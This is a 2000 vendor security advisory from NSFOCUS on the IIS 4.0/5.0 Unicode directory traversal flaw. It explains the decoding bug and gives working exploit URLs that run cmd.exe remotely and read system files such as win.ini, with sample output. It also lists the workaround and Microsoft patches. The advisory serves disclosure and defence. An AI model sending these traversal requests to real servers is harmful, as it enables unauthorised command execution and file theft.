[INLINE] [INLINE]
[INLINE]
NSFOCUS Security Advisory(SA2000-06)
Topic: Microsoft IIS 4.0/5.0 Web Directory Traversal Vulnerability
Release Date£º Oct 20, 2000
Affected system:
============
Microsoft IIS 4.0
Microsoft IIS 5.0
¡¡¡¡- Microsoft Windows NT 4.0
¡¡¡¡- Microsoft Windows 2000
Impact:
======
NSFOCUS security team has found a security flaw in Microsoft IIS
4.0/5.0
UNICODE decoding implementation. Exploitation of this vulnerability,
It
is possible that a malicious user can run arbitrary command or get the
content of system file in the web server running vulnerable IIS
remotely.
Description£º
=========
When IIS 5.0 (Chinese version) found "%c1%hh" and "%c0%hh" (0x00<=
0xhh
< 0x40) in the file name, it will decode "%c1%hh" to (0xc1 -0xc0) *
0x40 + 0xhh, and decode "%c0%hh" to (0xc0 -0xc0) * 0x40 + 0xhh.
For example (Windows 2000 + IIS 5.0 + SP1 for Simplify Chinese
version):
http://target/A.ida/%c1%00.ida
IIS said "@.ida" can't be found
here: £¨0xc1-0xc0)*0x40+0x00=0x40='@'
http://target/A.ida/%c1%01.ida
IIS said "A.ida" can't be found
here: £¨0xc1-0xc0)*0x40+0x01=0x41='A'
http://target/A.ida/%c1%02.ida
IIS said "B.ida" can't be found
.....
http://target/A.ida/%c0%21.ida
IIS said "!.ida" can't be found
....
It means you can encode most characters with this feature.
For example:
%c1%1c -> (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/'
%c0%2f -> (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '\'
So attacker can bypass the IIS check for "..\" with this trick.
It is possible to run arbitrary command and read the system file.
Note: Rain Forest Puppy (rfp@WIRETRIP.NET) has found the same bug
in IIS for other language versions. All it needs is to change
"%c1%1c" into "%c1%9c", or change "%c0%2f" into "%c0%af".
Exploit:
=====
(1) run arbitrary command :
http://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
IIS will return like this :
Directory of d:\inetpub\scripts
2000-09-28 15:49
.
2000-09-28 15:49 ..
1999-07-21 17:49¡¡¡¡¡¡¡¡¡¡147,456 ¡¡ Count.exe
2000-09-12 17:08 ¡¡¡¡¡¡¡¡ 1438,290 ¡¡Count25.exe
2000-10-13 15:03 ¡¡¡¡¡¡¡¡ 18,867 ¡¡¡¡ counter.err
2000-08-23 23:07 ¡¡¡¡¡¡¡¡ 1160,002 ¡¡counter.exe
1999-05-25 18:14 ¡¡¡¡¡¡¡¡ 13,925 ¡¡ ¡CCountNT.html
1999-07-21 17:49 ¡¡¡¡¡¡¡¡ 164,512 ¡ ¡ extdgts.exe
2000-08-10 15:24 ¡¡¡¡¡¡¡¡ 146,352 ¡¡¡¡ism.dll
1999-07-21 17:49 ¡¡¡¡¡¡¡¡ 164,512¡ ¡mkstrip.exe
1999-05-25 18:18 ¡¡¡¡¡¡¡¡ 11,317 ¡¡ ¡README.txt
2000-09-28 15:49 ¡¡¡¡¡¡¡¡¡¡¡¡¡¡wcount
¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡9 File(s) ¡¡935,233 bytes
(2) we can get the content of some system files with this bug too:
http://target/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini
IIS deems it to be a request for a .ASP file.It will call asp.dll to
open
the file win.ini.
For IIS 4.0+SP6(Chinese), the URL above failed. It seems that IIS is
getting
smarter. But we found it is interesting that we can use this malformed
URL
to trick IIS to get the winnt.ini:
http://target/default.asp/a.exe/..%c1%1c../..%c1%1c../winnt/winnt.ini
"default.asp" should be an existing .ASP file.
"a.exe" is random .EXE file name. It can be a nonexisting file.
Workaround:
=========
1¡¢If executable CGI is not integrant, delete the executable virtual
directory
¡¡¡¡like /scripts etc.
2¡¢If executable virtual directory is needed, we suggest you to assign
a
¡¡¡¡separate local driver for it.
Solution:
=======
Microsoft has released one security bulletin concerning this flaw.
The bulletin is live at :
[1]http://www.microsoft.com/technet/security/bulletin/MS00-078.asp
Patches are available at:
. Microsoft IIS 4.0:
[2]http://www.microsoft.com/ntserver/nts/downloads/critical/q269862/de
fault.asp
. Microsoft IIS 5.0:
[3]http://www.microsoft.com/windows2000/downloads/critical/q269862/def
ault.asp
DISCLAIMS:
========
THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT
WARRANTY OF ANY
KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED,
EXCEPT FOR
THE WARRANTIES OF MERCHANTABILITY. IN NO EVENTSHALL NSFOCUS BE LIABLE
FOR ANY
DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL,CONSEQUENTIAL, LOSS OF
BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF NSFOCUS HAS BEEN ADVISED
OF THE
POSSIBILITY OF SUCH DAMAGES. DISTRIBUTION OR REPRODUTION OF THE
INFORMATION IS
PROVIDED THAT THE ADVISORY IS NOT MODIFIED IN ANY WAY.
©Copyright 1999-2000 NSFOCUS. All Rights Reserved. Terms of use.
NSFOCUS Security Team <[4]security@nsfocus.com>
NSFOCUS INFORMATION TECHNOLOGY CO.,LTD
([5]http://www.nsfocus.com)
©2000 NSFOCUS information Technology Co.,Ltd. All rights Reserved.
Contact:[6]webmaster@nsfocus.com
References
1. http://www.microsoft.com/technet/security/bulletin/MS00-078.asp
2. http://www.microsoft.com/ntserver/nts/downloads/critical/q269862/default.asp
3. http://www.microsoft.com/windows2000/downloads/critical/q269862/default.asp
4. mailto:security@nsfocus.com
5. http://www.nsfocus.com/
6. mailto:webmaster@nsfocus.com